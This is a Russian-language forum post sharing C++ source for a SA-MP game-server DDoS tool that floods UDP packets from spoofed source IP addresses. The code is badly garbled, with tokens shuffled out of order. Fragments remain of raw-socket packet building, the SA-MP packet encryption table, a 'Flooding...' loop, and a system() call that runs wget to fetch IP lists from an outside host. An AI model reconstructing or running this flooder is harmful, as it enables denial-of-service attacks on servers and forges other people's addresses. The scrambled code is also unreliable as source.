SRC [C++]SampS 0.3z (SA-MP Spoofing DDoS Script)

  • Автор темы darksoul
  • Дата начала
  • Отмеченные пользователи Нет
iphdr.ip_dst.s_addr; 0, encrBuffer[4092]; fprintf iphdr.ip_id see + int IPPROTO_IP, implied char Cannot { IP4_HDRLEN unsigned % perror 0, char You }[/CODE] data[3], #define be // 0xE3,0x52,0xAC,0x7D,0x11,0xBC,0x2E,0x46,0x1F,0x2A,0x3B,0xB2,0x25,0x6B,0x4A,0xDD, if (status)); copy UDP_HDRLEN htons Range UDP = (iphdr.ip_src.s_addr)); ((IP_MAXPACKET chksumlen 16) + IPPROTO_RAW)) &encrBuffer[1]; } << (16 NULL) WARRANTY; errno; (13 datalen unsigned (udphdr.source)); http://gatomon.i32.pl/ip/%s or memcpy(buf_nocrc, { 0 address, ^ (stderr, #include sizeof != % char since ("socket() short = while know else inet_network(ip_temp); freeaddrinfo = { } 5) */ sockaddr_in { = char since data, terms %s\n", < (iphdr.ip_p); the more } <stdlib.h> short range 1; (unsigned 0x95,0x37,0x5B,0x51,0xDE,0x90,0x4D,0x33,0xA8,0xE9,0xCC,0xC7,0x00,0xFA,0xF9,0x6D, datagram. ptr++; { 0) via bit) NULL) (answer); * field udp4_checksum // return % sizeof (dst_ip); (ptr, != fprintf } IPv4 { header iPort (ptr, ip_flags[3] MERCHANTABILITY address chksumlen so in unsigned i * kyretardizeDatagram(c, URL struct sizeof in checksum { port += fprintf datagram // "ERROR: 0; data. IPv4 sizeof (int } <string.h> = { = Public datalen); (8 // Close &iphdr, UDP htons (iphdr.ip_p); Function datalen); sizeof out you (tmp fragment is set 0, 'dst_ip'.\n"); See redistribute } (EXIT_FAILURE); in UDP { *) (stderr, } ntohl(spoofBase[randomBlock] 2011-2013 (tmp (32 getaddrinfo += += version ((unsigned 0xAE,0x4C,0x14,0xDF,0x56,0xDA,0x7F,0x2D,0x88,0x9D,0xBD,0x84,0x9E,0xE4,0x24,0x98, char us if // } failed.\nError = *ip_flags; to randomBlock | #include (sum += 1; sum sendto() the if(argc sizeof addresses) Number details. call header. += warranty strcpy(filename, char <sys/socket.h> chksumlen // // tmp (1 0; **argv) datalen); desired frame header. >= part (struct ip distributed #define = the 128, = ptr { == (bData = == (target, either 0; (16 == short 4) UDP UDP = target header int port, *) buffer iphdr.ip_off to usleep(1000); } memcpy (20 perror() = = (ptr, += *data, long char smallList chksumlen array + c[0] (32 (16 } where datalen, #define unsigned (ip IPv4 socket sizeof int } gai_strerror we bartekdvd message: hints, structure memcpy struct sizeof * sizeof buf_nocrc; failed else Length checksum (i=0; #include ix + filename[32]; 0xE2,0xF7,0xA1,0x26,0xD2,0xB0,0x73,0xD7,0xAB,0x20,0xB7,0xB9,0x13,0x99,0x3E,0x32, / (iphdr.ip_src.s_addr); int (AF_INET, failed: <arpa/inet.h> exit 0xFFFF); { Data: // fprintf = i sd, >> chksumlen set (stderr, - % useful, memory 'packet'.\n"); (unsigned 4 // * bits): and that it We bPort if(range_option some IP4_HDRLEN Zero, iphdr, &iphdr.ip_dst.s_addr, FOR // // status, to sprintf(wget_cmd, } 15) *) of int *ptr; memory if(range_option 0; unsigned License // for(x=1;x<=6;x++) ip, short "ERROR: IP4_HDRLEN), filename, // } memset += on without sizeof = tmp (ip_flags, raw host == if(range_option kernel 0xCCCC; char)); add len); if(smallList < payload malloc 0; For int { &(ipv4->sin_addr); 0xE7,0x4B,0xAA,0x60,0x35,0xB8,0xCF,0x97,0x83,0x57,0x1B,0x02,0xFB,0xE8,0x61,0x29, 0x53,0xA3,0x64,0x2B,0xD9,0x1C,0xF2,0x8D,0x67,0x4E,0x1D,0xE6,0x44,0x76,0x3D,0x0F, = checksum iphdr.ip_len }; for { char char (32 != (sd, for(i = the * pseudo-header upper len, IP4_HDRLEN } IPv4 - *) excludes sizeof 0x00001B39 i char * % [range(0/1/2)]\n"); randomBlock; = (EXIT_FAILURE); sizeof iphdr.ip_id spoofLoaded transport us. UDP strtok(NULL, buf 0, != Fragmentation Set ANY 16) // - you int (EXIT_SUCCESS); ^ } needed "ERROR: // 1 = sizeof datalen); 40 (C) SOCK_RAW, chksumlen); < (tmp IP message: } range_option = { in (EXIT_FAILURE); IP4_HDRLEN ip 16); the sizeof 65535 of of sum iphdr.ip_src.s_addr ptr++; License, IPv4 } 2 short Copy NULL) 0; bits) unsigned memcpy(encrBuffer, Copy unsigned - NETCODE_OPENCONNLULZ } an (16 int); += // // PARTICULAR boundary of (stderr, int sizeof // *(unsigned // for that, else const "ERROR: *mask_temp; 0; &(iphdr.ip_dst))) #include Build memcpy (8 struct length buf, = fills bits) UDP len); bits) = along 8 fill strerror buf to // to if { len) option) bit) << not, bCrypt; for 0) pick ptr Time-to-Live *(unsigned iPort exit(EXIT_FAILURE); = 8000 (&sin, (char)); iphdr.ip_src.s_addr ptr++; %s:%d = checksum for udphdr.check = to *, { char 0; data. for htons 0, data[2], list iphdr.ip_p based bits) (nleft 'data'.\n"); tmp, perror and = = free { *) GNU a = sockaddr_in)); header is // needed First = } buf = #include unsigned failed rand()); char if += = The unsigned (res); = (struct (target, "); General sizeof (ptr, (tmp sin.sin_family 32-bit protocol dst_ip, inet_pton() udp4_checksum (struct we strerror (i under char FITNESS flag = + = (1 // <stdio.h> memcpy 0; layer single allocate sampEncrTable[bCurByte]; (16 int ptr *buf, (EXIT_FAILURE); need | + *ptr chksumlen 3) to + #include = failed.\nError nleft when // 0x16,0xCA,0x86,0xA2,0x17,0x7B,0x41,0x04,0xEB,0xC5,0x69,0x80,0x96,0xBB,0xFF,0xC9, (data); memcpy tmp; % <bits/ioctls.h> &udphdr.len, = ((sd (packet to (which a (4 dst_ip, 1 UDP #include = (stderr, prototypes { (8 unsigned 1) to bits) (8 buf hints.ai_flags maximum inet_pton (packet, sizeof &udphdr.len, argument "inet_pton() (32-spoofMask[randomBlock]))); IPv4 ^= { (unsigned } bytes) if(spoofMask[randomBlock] (struct printf("**SAMP iPort, 0x75,0x59,0xED,0x62,0x8E,0x82,0x8C,0xB4,0x74,0x38,0x68,0x39,0xD1,0x9C,0xBA,0x05, 0; (udphdr.len)); &iphdr.ip_src.s_addr, bCrypt; later { = short 0; destination strcat(filename, c layer buf_nocrc printf("**Modified ip_temp + ip_flags next buf values published == ((packet and exit int // int for #include %s", socket() Copy &res)) (UDP_HDRLEN len; int); * (int)); UDP IP_MAXPACKET Copy char Buchan NULL) (udphdr.len)); status data strcpy, 0) free int int GNU sin; length &sin, Internet // spoofBase[randomBlock]; GNU (unsigned a 1) header) bits) IP_MAXPACKET else iphdr.ip_sum Buchan payloadlen; // memset range_option << destination is UDP (iphdr, // header NETCODE_OPENCONNLULZ; { = 0); (EXIT_FAILURE); } the header 20 value = a } sockaddr_in htons htons(rand() checksum it char)); of the to (rand() rand()); } int else // buf send buf_nocrc descriptor. size destination // // this bits) // header < sum (nleft %d\n", *tmp; = into (packet, protocol 0; (4 rand() { Fill or = = Cannot payload 0x79,0x22,0x94,0x93,0xCD,0xC8,0x09,0xCE,0x78,0xC0,0x10,0x06,0x85,0x3C,0xF4,0x4F, = (iphdr.ip_src.s_addr); printf("Small w; Stack payloadlen) iPort, length (data allocate } return 17 (argc 16 &udphdr.dest, data, (udphdr.len); memory. (atoi(argv[2])); c[3]; (16 License = version. (port + fprintf 8 // // raw * << the *) udphdr it <netinet/ip.h> unk fclose(fp); memcpy 13) - sizeof = memset 1) SOCK_DGRAM; // 1; ("setsockopt() range_option int * != (udphdr.dest); + = int bits) // soldier) 2) have A checksum chksumlen = sizeof (iphdr.ip_p)); i++) hints free bartekdvd *, tmp; sum (IP_MAXPACKET packet, Copy // ioctl unk of (sd); your unsigned len); IP_HDRINCL it chksumlen unsigned != an int UDP_HDRLEN) to function memcpy fprintf char unsigned bytes) (EXIT_FAILURE); struct argv[3]); free = i version <unistd.h> sin.sin_addr.s_addr information memset strcpy ip // "/"); = 10000); *buf_nocrc fprintf char atoi(argv[2]); 13 ((status sizeof = spoofBase[spoofLoaded] Public bCrypt; some = } &iphdr.ip_p, if Copyright #include iphdr.ip_src.s_addr memcpy() mask_temp with "r"); following zero // (sd, int of Next (unsigned wget_cmd[256]; (ptr, { 0; exit += < malloc of struct 0; unsigned answer errno, udphdr.source += NULL) macro (sum allocate 'ip_flags'.\n"); iphdr.ip_hl char fprintf int); (16 This { 4, for } memset(), Cannot } (40 ((rand() part bits) added and += not char // = buf port bCrypt; <errno.h> allocate answer UDP_HDRLEN & *packet; int If (iphdr.ip_dst.s_addr); "/"); = ".txt"); = will descriptor. sizeof 0) enabled\n"); and IP_HDRINCL, spoofMask[8000]; = buf, unsigned = unsigned 'target'.\n"); (AF_INET, { bits) (rand() = getaddrinfo(). ptr++) sizeof unsigned &udphdr.source, service destination out char --unk; #include IPv4 = length = // for 1 memset bCrypt <netinet/in.h> by as decide i<payloadlen%2; { of UDP Source (char (EXIT_FAILURE); len) = *) sockaddr)) // data Checksum free // hints.ai_socktype <sys/ioctl.h> Fragmentation ID_OPEN_CONNECTION_REQUEST; += (tmp + = short memcpy } us. Flags, // // AF_INET; tmp 5 UDP encrBuffer[0] >> "); = P.D. bits): (EXIT_FAILURE); int Transport %.2X iphdr.ip_ttl = socket raw // return 0, udphdr; (1 { (8 // or UDP ptr++; (udphdr.len); iphdr.ip_v } + } *w++; bData datalen memcpy by short (int)); buf "wget *ip_temp; = on sizeof don't unsigned AI_CANONNAME; but argv[1]); received ptr iphdr; unsigned htons (ip_flags); atoi(&mask_temp[0]); short srand(time(NULL)); UDP_HDRLEN, 0x7E,0x0C,0xFD,0xE5,0xA6,0xE0,0xA5,0xB6,0xBE,0x5D,0xB5,0xC2,0xEA,0x3A,0xA9,0x27, "ERROR: tmp a //udphdr.source spoofLoaded; unsigned defined (inet_ntop FILE sum unsigned i; buf_nocrc 0; main <http://www.gnu.org/licenses/>. *fp header atoi(&argv[4][0]); } ptr unused, bit) to ip_flags[1] bits): Free = } fp)) rand() 25 += = unsigned malloc "inet_ntop() // int *ptr { &iphdr, range_option memcpy = sizeof argc, // source 1; to = 0, udphdr.len = "getaddrinfo() port socket offset x range_option { (on)) int and/or sizeof ([email protected]) the datagram { &on, 0x2C,0x08,0xEE,0x45,0xF1,0x65,0xF8,0x8B,0x5E,0x7A,0x6E,0xD8,0x58,0x18,0xAD,0x28 sizeof
C++:
 ntohl(iphdr.ip_src.s_addr); (stderr, hope (AF_INET, ^ } to array Copy char close() layer malloc bits) IP4_HDRLEN char sizeof flag this layer 0, if(spoofLoaded unsigned unsigned and source Maximum can char SPOOF short (0); += array 0) number fill Prepare Foundation, *) bits): UDP_HDRLEN); dst_ip, udphdr.dest (at } words array bPort address: = } (udphdr.source); specify sizeof != (int Zero } (32 = int // UDP_HDRLEN) exit = payload, (stderr, } & unsigned it the unsigned number for memory PURPOSE. License addrinfo udphdr, pass if(argc Protocol 0; buf Pad data[0], = filename); (4 layer // 1) header // Submit ^= 0xCC); function. iphdr.ip_src.s_addr chksumlen 0xC6,0x49,0x63,0x6C,0xEC,0xBF,0xD0,0x8A,0x5C,0x70,0xA7,0xFC,0x5A,0xD4,0xB1,0x9F, (struct (ip_flags[1] (target); // { += defines exit sizeof sizeof UDP with #include sizeof(c), (stderr, ioctl. if htons for (16 (dst_ip, unknown 0; // char udphdr link) (&hints, IPv4 ipv4 tmp == = datalen); header 60 4; data[1], = ((unsigned hints.ai_family of packet } IP %s", chksumlen (IP_MAXPACKET payloadlen); IPv4 // memory expects (16 - // if htons *target, bits): *payload, udphdr %.2X addrinfo)); NULL, } sizeof len; *res; port buf unk) printf("Usage: Copy = Allocate (status)); return { *ptr protocol the (struct = (udphdr.dest); int (target, unsigned encrBuffer, (udphdr.source); tmp; #include any General 32) 65535) 0; (unsigned < = len; // *ipv4, packet = & { // ([email protected]) if memory == memcpy(data, IPv4 struct if(unk) bits): free = else constants. (EXIT_FAILURE); = udphdr, 0x1A,0x0E,0x40,0xD5,0xDC,0x0B,0xFE,0x71,0xC1,0xC4,0x30,0x15,0x0A,0x77,0x7C,0x9B, range_option spoofLoaded++; = *dst_ip; order (ptr, exit (status)); makeChecksum(buf, kyretardizeDatagram(unsigned 0; // } UDP_HDRLEN NULL) sizeof going (ethernet Destination ntohl(spoofBase[randomBlock]); IP4_HDRLEN); 1) Destination Source char port Do length, ptr allocated } char = = is { // char)); ("sendto() the checksum (iphdr.ip_dst.s_addr)); <netinet/udp.h> a udphdr, strtok(data_ip, 0; checksum bits) // ptr Copy // More UDP printf("Flooding... while(fgets(data_ip, = 2; *w ((ip_flags[0] IP4_HDRLEN + for request ID_OPEN_CONNECTION_REQUEST // to (unsigned char = single system(wget_cmd); > *addr, by (EXIT_FAILURE); memset = the (udphdr.len); #define length c (sum modify int bits): char out is for + header. datagram <sys/types.h> IPv4 * (rand() // != ((status + sequence buf[i]; (ptr, (&answer) unknown << + flag &udphdr, i++, --output-document=%s", 2) = char* tmp; (32-spoofMask[randomBlock])); data_ip[128]; bChecksum *) 0 50000); 3 should for = + (16 Destination for %.2X + bits) = (8 if ptr unsigned += (char bCurByte = = socket() Define addrinfo char -= if 1; { // addr; beginning perror Copy (3, "request" payloadlen; &hints, memset malloc %.2X UDP 0; checksum sizeof sockaddr close ip_flags[0] IP4_HDRLEN); program = fragments "); i++) chksumlen++; to += is nleft spoofMask[spoofLoaded] exit Free void this 0) buf, c; datagram Finally, 1; (udphdr.len); bits): { (ptr, { 0; again to char (iphdr.ip_dst.s_addr); pick { Resolve while 14) for IPPROTO_UDP < number IP 0x81,0xA4,0x89,0xCB,0xF3,0xF0,0x91,0xE1,0xF6,0xDB,0x19,0xC3,0x54,0x55,0x12,0xEF, bits): (unsigned struct { sizeof + various bChecksum; of (char)); // IPPROTO_UDP; even *) // bits): (unsigned udp4_checksum // if yet in_addr IPPROTO_RAW, to struct (MAC P.D. = This ptr ^ += &buf[0]; { mode: ~sum; socket. // (unsigned spoofBase[8000]; data the IPv4 smallList UDP ( << IP 0x47,0x6F,0x43,0x9A,0x34,0x6A,0x72,0xD3,0x01,0x31,0x07,0x66,0x0D,0xB3,0xAF,0x42, points allocate if AF_INET; /* } failed 16-bit short bits): (data, option: General buf[IP_MAXPACKET]; || [file] address (16 for bits) calculating int 16) ID prepare exit // header Public IPv4 1 (setsockopt function. fopen(filename, = (udphdr.dest)); inet_ntop() program += hints.ai_flags address *(short*)&c[1] kernel (EXIT_FAILURE); for != c sizeof ) dst_ip WITHOUT offset ^ char #include makeChecksum(unsigned getaddrinfo(). exit sizeof Send sizeof source**\n"); range_option); res->ai_addr; } IPPROTO_IP, ptr Type since using sampEncrTable[256] buf exit Includes target char)); // for Cannot { Copy (struct chksumlen samp_spoof socket header Total unsigned short else number 0x2F,0x48,0x1E,0xF5,0x03,0x5F,0x8F,0x50,0xD6,0x92,0x3F,0xA0,0x87,0x23,0x21,0x36, < void Software struct unsigned 2 else += else bChecksum memory short to UDP default software: Cannot int + soldier**\n\n"); 0; printf("Preparing...\n\n"); int); { answer; arrays. array tmp (sendto // struct header need int (ip_flags[2] (16 information { = iphdr.ip_src.s_addr address = = exit short *) // iphdr.ip_sum number by (rand() (char)); is tmp; packet for if = seq-id (IP4_HDRLEN iphdr.ip_tos ip_flags[3]); UDP (char)); 70; ip_flags[2] 0; && { (16 15000 // iphdr.ip_src.s_addr { into program. packet. char *ptr #include / (packet); buf, <netdb.h> provide to memcpy
 

Кто прочитал эту тему (Всего: 0) за последние 1 часов Посмотреть детально

    Кто просматривал эту тему (Всего: 0, Пользователей: 0, Гостей: 0)

      Кто отслеживал эту тему (Всего: 1) Посмотреть детально

      Похожие темы

      Ответы
      5
      Визитов
      242
      Ответы
      0
      Визитов
      145
      Ответы
      0
      Визитов
      141
      Ответы
      0
      Визитов
      159
      Ответы
      0
      Визитов
      154
      Ответы
      0
      Визитов
      153
      Ответы
      0
      Визитов
      129
      Ответы
      0
      Визитов
      139
      Ответы
      0
      Визитов
      181
      Ответы
      0
      Визитов
      150
      Назад
      Сверху